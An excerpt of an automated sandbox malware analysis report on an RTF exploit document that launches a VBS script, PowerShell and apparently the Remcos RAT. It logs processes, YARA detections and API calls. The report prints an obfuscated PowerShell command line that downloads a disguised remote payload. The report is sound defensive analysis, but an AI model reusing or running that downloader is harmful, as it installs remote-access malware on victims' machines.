                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,9_2_004167EF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00224D588_2_00224D58
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00224D488_2_00224D48
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00223F7A8_2_00223F7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043706A9_2_0043706A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004140059_2_00414005
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E11C9_2_0043E11C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004541D99_2_004541D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004381E89_2_004381E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041F18B9_2_0041F18B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004462709_2_00446270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E34B9_2_0043E34B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004533AB9_2_004533AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0042742E9_2_0042742E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004375669_2_00437566
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E5A89_2_0043E5A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004387F09_2_004387F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043797E9_2_0043797E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004339D79_2_004339D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0044DA499_2_0044DA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00427AD79_2_00427AD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041DBF39_2_0041DBF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00427C409_2_00427C40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00437DB39_2_00437DB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00435EEB9_2_00435EEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043DEED9_2_0043DEED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00426E9F9_2_00426E9F
                Source: ~WRF{07782794-9C99-45A3-9EF6-DEC334E5B758}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9302
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9302Jump to behavior
                Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: RegAsm.exe PID: 3844, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPEDMatched rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 author = ditekSHen, description = detects CVE-2017-8759 weaponized RTF documents.
                Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winRTF@10/19@470/3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,9_2_0041798D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,9_2_0040F4AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,9_2_0041B539
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_0041AADB
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-GT4655
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7A2E.tmpJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................T.r.u.e.(.P.....4.......<...............w".........................s............(.1.............@.1.............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................................u.e.(.P.....4.......<...............|".........................s............(.1.............................Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
